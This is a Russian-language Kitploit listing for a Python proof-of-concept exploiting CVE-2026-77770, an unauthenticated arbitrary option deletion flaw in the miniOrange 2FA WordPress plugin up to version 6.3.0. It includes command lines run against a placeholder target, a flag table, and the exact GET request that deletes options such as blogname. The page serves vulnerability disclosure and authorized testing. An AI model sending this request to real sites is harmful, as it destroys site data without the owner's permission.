Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-77770 — Python PoC для CVE-2026-77770 — уязвимости неаутентифицированного произвольного удаления опций WordPress в плагине miniOrange 2FA (<= 6.3.0) через ссылку подтверждения email. | Kitploit
Инструменты/GitHubGitHub/cflowsec/cve-2026-77770
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubcflowsec/cve-2026-77770

CVE-2026-77770

Python PoC для CVE-2026-77770 — уязвимости неаутентифицированного произвольного удаления опций WordPress в плагине miniOrange 2FA (<= 6.3.0) через ссылку подтверждения email.

Репозиторий
15 ч 51 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-77770

miniOrange 2FA CVE POC

miniOrange 2FA (плагин WordPress miniorange-2-factor-authentication) ≤ 6.3.0 — неаутентифицированное произвольное удаление опций WordPress через ссылку подтверждения email (userID / Txid / accessToken).

Только для авторизованного тестирования. Не запускайте это против систем, которыми вы не владеете или на тестирование которых у вас нет разрешения.

Требуется: Python 3, только стандартная библиотека.

root@kitploit:~
python3 cve-2026-77770-miniorange-2fa-option-delete.py -u http://TARGET --test
python3 cve-2026-77770-miniorange-2fa-option-delete.py -u http://TARGET --test --delete blogname
python3 cve-2026-77770-miniorange-2fa-option-delete.py -u https://TARGET --delete blogname --insecure
python3 cve-2026-77770-miniorange-2fa-option-delete.py -u TARGET --delete blogname
ФлагЧто делает
-u / --urlКорень сайта WordPress (обязательно). http:// или https://; имя хоста сначала пробуется как HTTPS, затем HTTP. Самоподписанный TLS повторяется автоматически
--testГость: версия плагина + всплывающее окно подтверждения email
--delete OPTIONУдалить эту строку wp_options. blogname виден через /wp-json/ (BEFORE / AFTER)
--gate OPTIONОпция, сохранённое значение которой равно 3 (шлюз Txid). Можно повторять. По умолчанию: wp_page_for_privacy_policy, затем thread_comments_depth
--insecureПропустить проверку TLS
--timeoutТаймаут HTTP в секундах (по умолчанию 30)

Без аутентификации. Гаджет — это GET-запрос к /?userID=OPTION&Txid=GATE&accessToken=x. GATE в данный момент должен содержать целое число 3. При промахе 5-минутного окна плагин также записывает GATE=0.

--test ничего не удаляет. --delete blogname — публичное доказательство (название сайта в /wp-json/ становится пустым). 6.3.1 добавляет префиксы к ключам (mo2f_oobe_*), поэтому имена без префикса не удаляются.

Stdout: VERSION, HANDLER, PRESENT, SITENAME, OPTION, BEFORE, AFTER, GATE, VULNERABLE, NOT_VULNERABLE, NOT_FOUND, ATTEMPTED.

Working PoC

CVE: CVE-2026-77770. Список изменений плагина 6.3.1.

Скачать инструмент